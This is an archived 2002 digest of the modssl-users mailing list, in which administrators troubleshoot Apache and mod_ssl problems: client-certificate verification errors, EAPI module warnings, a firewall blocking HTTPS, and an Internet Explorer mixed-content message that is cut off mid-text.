	boundary="----_=_NextPart_001_01C23D4E.B839E2E0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tantaoui, Omar" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C23D4E.B839E2E0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Yes I do want to restrict access to certificate owner. But both =
Netscape 6.2
and IExplorer don't ask for a cert to submit to server.
=20
And what about [Hint: No CAs known to server for verification?]

-----Message d'origine-----
De : Boyle Owen [mailto:Owen.Boyle@swx.com]
Envoy=E9 : mardi 6 ao=FBt 2002 15:32
=C0 : modssl-users@modssl.org
Objet : RE: Autehticated access / cygwin


The problem is all in the error messages.. You are requesting that =
clients
provide a certificate (SSLVerifyClient require) but then they do not do =
so
(peer did not return a certificate) do you really want the clients all =
to
have certs?
=20
Rgds,
=20
Owen Boyle
=20
=20
 -----Original Message-----
From: Tantaoui, Omar [mailto:TantaO@europe.stortek.com]
Sent: Dienstag, 6. August 2002 13:24
To: 'modssl-users@modssl.org'
Subject: Autehticated access / cygwin



Hi,=20

I'm using Apache + mod_ssl on cygwin platform.=20

I want to restrict access to authenticated users, so I wrote in =
httpd.conf:=20

=20
    SSLEngine on=20
    SSLCertificateFile conf/ssl.crt/CAWebCert.pem=20
    SSLCertificateKeyFile conf/ssl.key/CAWebKey.pem=20
    SSLCACertificatePath conf/ssl.crt=20
    SSLCACertificateFile conf/ssl.crt/cacert.pem   =20
    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown=20

    =20
       SSLVerifyClient require=20
       SSLVerifyDepth 2   =20
       SSLRequire %{SSL_CLIENT_S_DN_C} eq "FR" and  =
%{SSL_CLIENT_S_DN_O} eq
"StorageTek" and \=20
          %{SSL_CLIENT_S_DN_CN} eq "Omar Tantaoui"=20
    =20

    ServerAdmin CAAdministrator@storagetek.com=20
    DocumentRoot "/usr/local/apache/htdocs/ra"=20
    ServerName tou-ws-sd2138=20
    ErrorLog logs/raserver-error.log=20
    CustomLog logs/raserver-access.log common=20
    ScriptAlias /cgi-bin/ /usr/local/apache/cgi-bin/=20
=20

But i got the following error:=20
[Tue Aug  6 11:56:39 2002] [error] mod_ssl: Re-negotiation handshake =
failed:
Not accepted by client!?=20
[Tue Aug  6 11:56:39 2002] [error] mod_ssl: SSL error on writing data
(OpenSSL library error follows)=20
[Tue Aug  6 11:56:39 2002] [error] OpenSSL: error:140890C7:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate
[Hint: No CAs known to server for verification?]

I don't what does it mean.=20

What's wrong with my httpd.conf ?=20

Regards=20

Omar Tantaoui=20


------_=_NextPart_001_01C23D4E.B839E2E0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable




Autehticated access / cygwin




Yes I=20
do want to restrict access to certificate owner. But both Netscape 6.2 =
and=20
IExplorer don't ask for a cert to submit to server.


 


And=20
what about [Hint: No CAs known to server for=20
verification?]



  
-----Message d'origine-----
De : Boyle Owen=20
  [mailto:Owen.Boyle@swx.com]
Envoy=E9 : mardi 6 ao=FBt =
2002=20
  15:32
=C0 : =
modssl-users@modssl.org
Objet : RE:=20
  Autehticated access / cygwin


  
The=20
  problem is all in the error messages.. You are requesting that =
clients provide=20
  a certificate (SSLVerifyClient require) =
but then=20
  they do not do so (peer did not return a=20
  certificate) do you really want the clients all to have=20
  certs?

  
 

  
Rgds,

  
 

  
Owen=20
  Boyle

  
 

  
 

  
 -----Original=20
  Message-----
From: Tantaoui, Omar=20
  [mailto:TantaO@europe.stortek.com]
Sent: Dienstag, 6. =
August 2002=20
  13:24
To: 'modssl-users@modssl.org'
Subject: =
Autehticated=20
  access / cygwin


  

    
Hi, 

    
I'm using Apache + mod_ssl on cygwin =

    platform. 

    
I want to restrict access to =
authenticated users,=20
    so I wrote in httpd.conf: 

    
<VirtualHost =
_default_:8082>=20
    
    SSLEngine =
on 
    SSLCertificateFile=20
    conf/ssl.crt/CAWebCert.pem 
    SSLCertificateKeyFile=20
    conf/ssl.key/CAWebKey.pem 
    SSLCACertificatePath =
conf/ssl.crt 
    SSLCACertificateFile=20
    conf/ssl.crt/cacert.pem    
    SetEnvIf User-Agent ".*MSIE.*" =
nokeepalive=20
    ssl-unclean-shutdown 

    
    <Location =
/>=20
    
      =20
    SSLVerifyClient require 
       SSLVerifyDepth=20
    2    
       SSLRequire =
%{SSL_CLIENT_S_DN_C}=20
    eq "FR" and  %{SSL_CLIENT_S_DN_O} eq "StorageTek" and \ =

    
         =20
    %{SSL_CLIENT_S_DN_CN} eq "Omar Tantaoui" 
    </Location> 

    
    ServerAdmin=20
    CAAdministrator@storagetek.com 
    DocumentRoot =
"/usr/local/apache/htdocs/ra"=20
    
    ServerName=20
    tou-ws-sd2138 
    ErrorLog=20
    logs/raserver-error.log 
    CustomLog logs/raserver-access.log =
common=20
    
    ScriptAlias =
/cgi-bin/=20
    /usr/local/apache/cgi-bin/ 
</VirtualHost> 

    
But i got the following =
error: 
[Tue Aug  6 11:56:39 2002] [error] =
mod_ssl:=20
    Re-negotiation handshake failed: Not accepted by client!? =

[Tue Aug  6 11:56:39 2002] [error] =
mod_ssl: SSL error=20
    on writing data (OpenSSL library error follows) 
[Tue Aug  6 11:56:39 2002] [error] OpenSSL: =
error:140890C7:SSL=20
    routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a =
certificate=20
    [Hint: No CAs known to server for verification?]

    
I don't what does it mean. =


    
What's wrong with my httpd.conf =
? 

    
Regards 

    
Omar Tantaoui=20



------_=_NextPart_001_01C23D4E.B839E2E0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 16:10:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA20749; Tue, 6 Aug 2002 16:09:53 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id QAA20732; Tue, 6 Aug 2002 16:08:29 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id KAA14475;
	Tue, 6 Aug 2002 10:11:27 -0400
Date: Tue, 6 Aug 2002 10:11:27 -0400 (EDT)
From: "R. DuFresne" 
To: Alicianiah Cherry 
cc: "'modssl-users@modssl.org'" 
Subject: RE: Problem Connecting via https Over Network and Internet - SOLVED
 - Firewall Issue
In-Reply-To: <01C23D24.B09EA860.cherryal@riverstone.halifaxnc.com>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


You will not want to keep the machine without the firewall rules, as it
will be ow3d shortly if you do.  You need to findout how to make the
proper allow statements to open just that hole for the web ports open, 80
and 443.  Perhaps other rules to open ssh from only those sites you might
have to remotely access the system.

Thanks,

Ron DuFresne

On Tue, 6 Aug 2002, Alicianiah Cherry wrote:

> Just goes to show my inexperience with Linux - issuing the ipchains -F 
> input command cleared the firewall rules and now SSL connections work 
> GREAT!  Thanks to you all for your time and many responses.  I will be 
> quite busy today as I am moving a web app off a Win2K box and on to Linux - 
> the SSL problem was the only thing holding me up.  Apache seems to handle 
> SSL connections much faster than IIS.
> 
> Any help or suggestions you might offer in terms of advice on selecting a 
> CA, as well as recommended upgrades for Apache or mod_ssl would be greatly 
> appreciated. THANKS AGAIN!
> 
> Alicia Cherry
> Systems Administrator
> RiverStone Counseling
> 
> -----Original Message-----
> From:	Maurizio Marini [SMTP:maumar@datalogica.com]
> Sent:	Monday, August 05, 2002 10:37 PM
> To:	modssl-users@modssl.org
> Subject:	Re: Problem Connecting via https Over Network and Internet
> 
> > negating a firewall issue, I would think.
> 
> why do u thik this? have you tried to clear your firewall rules, before to 
> say
> this? if not, do it issuing as root: # ipchains -F input
> by default RedHat 7.3 install ipchains
> in any case, send us output of  ipchains -L -n (or the output of iptables 
> -L
> -n if u have configured iptables in your box)
> 
> 
> -- maumar
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 16:17:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA20906; Tue, 6 Aug 2002 16:15:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA20842; Tue, 6 Aug 2002 16:14:44 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 5F0DE4CE777; Tue,  6 Aug 2002 16:14:40 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 3EC1B28892; Tue,  6 Aug 2002 16:08:22 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from relay.pair.com id MAA14925; Tue, 6 Aug 2002 12:04:56 +0200 (MET DST)
Received: (qmail 63413 invoked from network); 6 Aug 2002 10:04:54 -0000
Received: from p50834328.dip0.t-ipconnect.de (HELO jura.uni-tuebingen.de) (80.131.67.40)
  by relay1.pair.com with SMTP; 6 Aug 2002 10:04:54 -0000
X-pair-Authenticated: 80.131.67.40
Message-ID: <3D4F9E4C.15C0F587@jura.uni-tuebingen.de>
Date: Tue, 06 Aug 2002 12:00:44 +0200
From: Adrian Hardt 
X-Mailer: Mozilla 4.78 [de] (Win98; U)
X-Accept-Language: de
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26 with mod_ssl: build failed
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Adrian Hardt 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

It works fine with building in mod_so. Thank you very much. Adrian
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 16:17:51 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA20930; Tue, 6 Aug 2002 16:15:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA20848; Tue, 6 Aug 2002 16:14:55 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 1C1454CE769; Tue,  6 Aug 2002 16:14:40 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E18E72888E; Tue,  6 Aug 2002 16:08:18 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from prospect.stortek.com id MAA14775; Tue, 6 Aug 2002 12:00:45 +0200 (MET DST)
Received: from prospect.stortek.com (localhost [127.0.0.1])
	by prospect.stortek.com (8.12.3/8.12.0) with ESMTP id g76A0TjJ029469
	for ; Tue, 6 Aug 2002 04:00:29 -0600 (MDT)
Received: from vinson-ether1.stortek.com (vinson-ether1.stortek.com [129.80.16.134])
	by prospect.stortek.com (8.12.3/8.12.0) with ESMTP id g76A0TGQ029466
	for ; Tue, 6 Aug 2002 04:00:29 -0600 (MDT)
Received: from [129.80.178.150] ([129.80.178.150])
	by vinson-ether1.stortek.com (8.12.3/8.12.0) with ESMTP id g76A0RjB020956
	for ; Tue, 6 Aug 2002 04:00:28 -0600 (MDT)
Received: from eur-bridge.europe.stortek.com (unverified) by 
 (Content Technologies SMTPRS 4.2.1) with ESMTP id  for ;
 Tue, 6 Aug 2002 10:57:11 +0100
Received: by eur-bridge.europe.stortek.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 6 Aug 2002 11:00:26 +0100
Message-ID: <2441703C50E90A48AE978E8AC936C0040A0ED8@toumsg01.europe.stortek.com>
From: "Tantaoui, Omar" 
To: "'modssl-users@modssl.org'" 
Subject: Authenticated Acess on cygwin
Date: Tue, 6 Aug 2002 11:00:40 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C23D30.1F1F8880"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tantaoui, Omar" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C23D30.1F1F8880
Content-Type: text/plain;
	charset="iso-8859-1"

Hi,

I'm using Apache + mod_ssl on cygwin platform.

I want to restrict access to authenticated users, so I wrote in httpd.conf:


    SSLEngine on
    SSLCertificateFile conf/ssl.crt/CAWebCert.pem
    SSLCertificateKeyFile conf/ssl.key/CAWebKey.pem
    SSLCACertificatePath conf/ssl.crt
    SSLCACertificateFile conf/ssl.crt/cacert.pem    
    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown

    
       SSLVerifyClient require
       SSLVerifyDepth 2    
       SSLRequire %{SSL_CLIENT_S_DN_C} eq "FR" and  %{SSL_CLIENT_S_DN_O} eq
"StorageTek" and \
          %{SSL_CLIENT_S_DN_CN} eq "Omar Tantaoui"
    

    ServerAdmin CAAdministrator@storagetek.com
    DocumentRoot "/usr/local/apache/htdocs/ra"
    ServerName tou-ws-sd2138
    ErrorLog logs/raserver-error.log
    CustomLog logs/raserver-access.log common
    ScriptAlias /cgi-bin/ /usr/local/apache/cgi-bin/
 

But i got the following error:
[Tue Aug  6 11:56:39 2002] [error] mod_ssl: Re-negotiation handshake failed:
Not accepted by client!?
[Tue Aug  6 11:56:39 2002] [error] mod_ssl: SSL error on writing data
(OpenSSL library error follows)
[Tue Aug  6 11:56:39 2002] [error] OpenSSL: error:140890C7:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate
[Hint: No CAs known to server for verification?]

I don't what does it mean.

What's wrong with my httpd.conf ?

Regards

Omar Tantaoui



------_=_NextPart_001_01C23D30.1F1F8880
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






Authenticated Acess on cygwin




Hi,




I'm using Apache + mod_ssl on cygwin =
platform.




I want to restrict access to =
authenticated users, so I wrote in httpd.conf:




<VirtualHost =
_default_:8082>

    SSLEngine =
on

    SSLCertificateFile =
conf/ssl.crt/CAWebCert.pem

    =
SSLCertificateKeyFile conf/ssl.key/CAWebKey.pem

    =
SSLCACertificatePath conf/ssl.crt

    =
SSLCACertificateFile conf/ssl.crt/cacert.pem    

    SetEnvIf =
User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown




    <Location =
/>

       =
SSLVerifyClient require

       =
SSLVerifyDepth 2    

       =
SSLRequire %{SSL_CLIENT_S_DN_C} eq "FR" and  =
%{SSL_CLIENT_S_DN_O} eq "StorageTek" and \

          =
%{SSL_CLIENT_S_DN_CN} eq "Omar Tantaoui"

    =
</Location>




    ServerAdmin =
CAAdministrator@storagetek.com

    DocumentRoot =
"/usr/local/apache/htdocs/ra"

    ServerName =
tou-ws-sd2138

    ErrorLog =
logs/raserver-error.log

    CustomLog =
logs/raserver-access.log common

    ScriptAlias =
/cgi-bin/ /usr/local/apache/cgi-bin/

</VirtualHost> 




But i got the following error:

[Tue Aug  6 11:56:39 2002] =
[error] mod_ssl: Re-negotiation handshake failed: Not accepted by =
client!?

[Tue Aug  6 11:56:39 2002] =
[error] mod_ssl: SSL error on writing data (OpenSSL library error =
follows)

[Tue Aug  6 11:56:39 2002] =
[error] OpenSSL: error:140890C7:SSL =
routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate =
[Hint: No CAs known to server for verification?]



I don't what does it mean.




What's wrong with my httpd.conf =
?




Regards




Omar Tantaoui







------_=_NextPart_001_01C23D30.1F1F8880--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 16:17:55 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA20927; Tue, 6 Aug 2002 16:15:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA20838; Tue, 6 Aug 2002 16:14:41 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 3FE964CE773; Tue,  6 Aug 2002 16:14:40 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id A7FF3286B3; Tue,  6 Aug 2002 16:07:52 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id JAA11218; Tue, 6 Aug 2002 09:03:25 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 6 Aug 2002 00:02:19 -0700
X-Originating-IP: [64.172.25.157]
From: "Kuen-Shian Wu" 
To: 
Subject: this module might crash under EAPI
Date: Tue, 6 Aug 2002 00:02:13 -0700
MIME-Version: 1.0
X-Mailer: MSN Explorer 7.00.0021.1700
Content-Type: multipart/alternative; boundary="----=_NextPart_001_0000_01C23CDC.84DDB830"
Message-ID: 
X-OriginalArrivalTime: 06 Aug 2002 07:02:19.0552 (UTC) FILETIME=[34950A00:01C23D17]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kuen-Shian Wu" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


------=_NextPart_001_0000_01C23CDC.84DDB830
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

hi,

   I am using the mod_ssl-2.8.10-1.3.26 with apache 1.3.26. however, I go=
t a bunch of error when I try to start the webserver. Anyone knows how to=
 sove the prolem? I alreay configure to complie with DEAPI follow by this=
 link: http://www.brtnet.org/linux/lampssl.htm



   [Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_env.so uses p=
lain Apache 1.3 API, this module might crash under EAPI! (please recompil=
e it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_mime.so uses pla=
in Apache 1.3 API, this module might crash under EAPI! (please recompile =
it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_negotiation.so u=
ses plain Apache 1.3 API, this module might crash under EAPI! (please rec=
ompile it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_include.so uses =
plain Apache 1.3 API, this module might crash under EAPI! (please recompi=
le it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_autoindex.so use=
s plain Apache 1.3 API, this module might crash under EAPI! (please recom=
pile it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_dir.so uses plai=
n Apache 1.3 API, this module might crash under EAPI! (please recompile i=
t with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_cgi.so uses plai=
n Apache 1.3 API, this module might crash under EAPI! (please recompile i=
t with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_asis.so uses pla=
in Apache 1.3 API, this module might crash under EAPI! (please recompile =
it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_imap.so uses pla=
in Apache 1.3 API, this module might crash under EAPI! (please recompile =
it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_actions.so uses =
plain Apache 1.3 API, this module might crash under EAPI! (please recompi=
le it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_userdir.so uses =
plain Apache 1.3 API, this module might crash under EAPI! (please recompi=
le it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_alias.so uses pl=
ain Apache 1.3 API, this module might crash under EAPI! (please recompile=
 it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_access.so uses p=
lain Apache 1.3 API, this module might crash under EAPI! (please recompil=
e it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_auth.so uses pla=
in Apache 1.3 API, this module might crash under EAPI! (please recompile =
it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_webapp.so uses p=
lain Apache 1.3 API, this module might crash under EAPI! (please recompil=
e it with -DEAPI)

thanks

kansenGet more from the Web.  FREE MSN Explorer download : http://explore=
r.msn.com

------=_NextPart_001_0000_01C23CDC.84DDB830
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


hi,
   
   I am using the mod_ssl-2.8.10-1.3.26 with=
 apache 1.3.26. however, I got a bunch of error when I try to start the w=
ebserver. Anyone knows how to sove the prolem? I alreay configure to comp=
lie with DEAPI follow by this link: http://www.brtnet.org/linux/lampssl.htm
 
&nb=
sp;
 
 
 
 
 
   [Tue Aug&=
nbsp; 6 02:57:36 2002] [warn] Loaded DSO libexec/mod_env.so uses plain Ap=
ache 1.3 API, this module might crash under EAPI! (please recompile it wi=
th -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/m=
od_mime.so uses plain Apache 1.3 API, this module might crash under EAPI!=
 (please recompile it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [wa=
rn] Loaded DSO libexec/mod_negotiation.so uses plain Apache 1.3 API, this=
 module might crash under EAPI! (please recompile it with -DEAPI)
[Tue=
 Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_include.so uses=
 plain Apache 1.3 API, this module might crash under EAPI! (please recomp=
ile it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO =
libexec/mod_autoindex.so uses plain Apache 1.3 API, this module might cra=
sh under EAPI! (please recompile it with -DEAPI)
[Tue Aug  6 02:5=
7:36 2002] [warn] Loaded DSO libexec/mod_dir.so uses plain Apache 1.3 API=
, this module might crash under EAPI! (please recompile it with -DEAPI)[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_cgi.so us=
es plain Apache 1.3 API, this module might crash under EAPI! (please reco=
mpile it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DS=
O libexec/mod_asis.so uses plain Apache 1.3 API, this module might crash =
under EAPI! (please recompile it with -DEAPI)
[Tue Aug  6 02:57:3=
6 2002] [warn] Loaded DSO libexec/mod_imap.so uses plain Apache 1.3 API, =
this module might crash under EAPI! (please recompile it with -DEAPI)
=
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_actions.so =
uses plain Apache 1.3 API, this module might crash under EAPI! (please re=
compile it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Loaded =
DSO libexec/mod_userdir.so uses plain Apache 1.3 API, this module might c=
rash under EAPI! (please recompile it with -DEAPI)
[Tue Aug  6 02=
:57:36 2002] [warn] Loaded DSO libexec/mod_alias.so uses plain Apache 1.3=
 API, this module might crash under EAPI! (please recompile it with -DEAP=
I)
[Tue Aug  6 02:57:36 2002] [warn] Loaded DSO libexec/mod_acces=
s.so uses plain Apache 1.3 API, this module might crash under EAPI! (plea=
se recompile it with -DEAPI)
[Tue Aug  6 02:57:36 2002] [warn] Lo=
aded DSO libexec/mod_auth.so uses plain Apache 1.3 API, this module might=
 crash under EAPI! (please recompile it with -DEAPI)
[Tue Aug  6 =
02:57:36 2002] [warn] Loaded DSO libexec/mod_webapp.so uses plain Apache =
1.3 API, this module might crash under EAPI! (please recompile it with -D=
EAPI)
 
thanks
 
 
 
kansen


Get more from the Web.  FREE MSN Ex=
plorer download : http://explorer.msn=
.com


------=_NextPart_001_0000_01C23CDC.84DDB830--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 16:38:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA22278; Tue, 6 Aug 2002 16:37:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns2.bln1.siemens.de id QAA22226; Tue, 6 Aug 2002 16:36:24 +0200 (MET DST)
Received: from mail.bln1.siemens.de (stbf6582 [194.138.127.68])
	by ns2.bln1.siemens.de (8.9.3/8.9.3) with ESMTP id QAA28079
	for ; Tue, 6 Aug 2002 16:36:16 +0200 (MEST)
Received: from sietec.de (localhost [127.0.0.1])
	by mail.bln1.siemens.de (8.11.6+Sun/8.11.6) with ESMTP id g76EaHh09718
	for ; Tue, 6 Aug 2002 16:36:17 +0200 (MEST)
Message-ID: <3D4FDED5.2050909@sietec.de>
Date: Tue, 06 Aug 2002 16:36:05 +0200
From: Alex Kuehne 
Organization: SAG
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en,de
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: this module might crash under EAPI
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Kuehne 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

-----Original Message-----
From: Kuen-Shian Wu [mailto:kansen@hotmail.com]
Sent: Tuesday, August 06, 2002 9:02 AM
To: modssl-users@modssl.org
Subject: this module might crash under EAPI


hi,

 > I am using the mod_ssl-2.8.10-1.3.26 with apache 1.3.26. however, I
 > got a bunch of error when I try to start the webserver. Anyone knows
 > how to sove the prolem? I alreay configure to complie with DEAPI
 > follow by this link: http://www.brtnet.org/linux/lampssl.htm

try this in your configure line:

configure --enable-rule=EAPI

this worked for me.

Best Regards,
Alex Kuehne


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 17:27:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA23952; Tue, 6 Aug 2002 17:26:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mta05-svc.ntlworld.com id RAA23946; Tue, 6 Aug 2002 17:25:09 +0200 (MET DST)
Received: from JUPITER ([81.97.241.19]) by mta05-svc.ntlworld.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP
          id <20020806152507.KHMT28874.mta05-svc.ntlworld.com@JUPITER>
          for ; Tue, 6 Aug 2002 16:25:07 +0100
Message-ID: <00c301c23d5e$07ba8680$0364a8c0@JUPITER>
From: "Nigel Croston" 
To: 
Subject: Enhydra \ Apache \ SSL \ Internet Explorer Problem
Date: Tue, 6 Aug 2002 16:29:18 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nigel Croston" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi All

Having a serious problem when trying to use SSL and Internet Explorer. Our
server
is running Enhydra, Apache and Mod SSL.

The problem occurs when we try and connect to our site via SSL (HTTPS).

When running our site though HTTPS, when pressing submit buttons or links
that post to the server, after maybe 2 or 3 times we get the following
warning message box.

"Downloading non-secure content from a secure web (yes, no, more info
buttons)"

if Yes is pressed we receive a "The page cannot be displayed" page.

if No is pressed we receive a blank white page with "NavigationCancelled" on
the top left hand corner.

Also when this occurs the browser doesnt even seem to connect to the server,
and a quick tap of the Back and Forward buttons on the browser usually means
the post hits the
server and normal service is resumed for a while

This error happens intermittantly, with no dissernable pattern
e.g. sometimes it will take 5 or 6 posts to appear, other times it will
happen after 1 or 2, and can happen on any of the pages that post
back to the server.

This error only appears on Internet Explorer, not on Netscape.

This error can be worked around client side by either unchecking the ...

